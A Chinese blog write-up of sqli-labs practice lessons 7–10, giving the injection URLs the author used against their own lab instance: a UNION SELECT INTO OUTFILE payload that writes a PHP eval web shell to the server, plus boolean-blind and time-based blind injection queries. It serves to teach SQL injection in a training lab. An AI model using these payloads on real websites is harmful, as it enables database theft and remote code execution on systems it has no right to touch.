美文网首页
sqli-labs Less-7-10

sqli-labs Less-7-10

作者: jun123123 | 来源:发表于2019-10-13 22:48 被阅读0次
  • Less-7
    这题主要考察outfile语句的用法,但是由于mysql对文件的权限限制很严格,原来打算将文件写入到Less-7这题的路径下,因为权限问题失败了,所以写到了/var/lib/mysql路径下。
    该路径可在mysql中使用show variables like "datadir"语句查看
    构造url:
http://sqli-labs.whye.xyz/Less-7/?id=1')) union select 1,2,"<?php @eval(_POST['cmd']); ?>" into outfile '/var/lib/mysql/3.php' --+

然后到/var/lib/mysql路径下查看,出现了3.php文件,查看内容:


Less-7-1.png

写入成功

  • Less-8
    布尔注入
    构造url:
http://sqli-labs.whye.xyz/Less-8/?id=1' and length((select database()))=8--+

成功回显,可知当前使用的数据库名为8位,构造url:

http://sqli-labs.whye.xyz/Less-8/?id=1' and substr((select database()),1,1)>'a'--+

成功回显,可以数据库名第一位>'a',用二分法可探测出整个数据库名,然后继续探测表名,列名,字段值。但太麻烦没有手工注,需要用脚本。但既然要用脚本,那为什么不sqlmap一把梭呢。

  • Less-9
    时间盲注
    构造url:
http://sqli-labs.whye.xyz/Less-9/?id=0' or if ((length(database())=8),sleep(1),1)--+

发现页面载入时间延迟1秒,if语句为真,database()数据库名长度为8。
其他和Less-8相同,将条件写在if语句中,返回页面有延迟则为真,否则为假。

  • Less-10
    和Less-9相同,单引号改双引号即可

相关文章

网友评论

      本文标题:sqli-labs Less-7-10

      本文链接:https://www.haomeiwen.com/subject/spgkmctx.html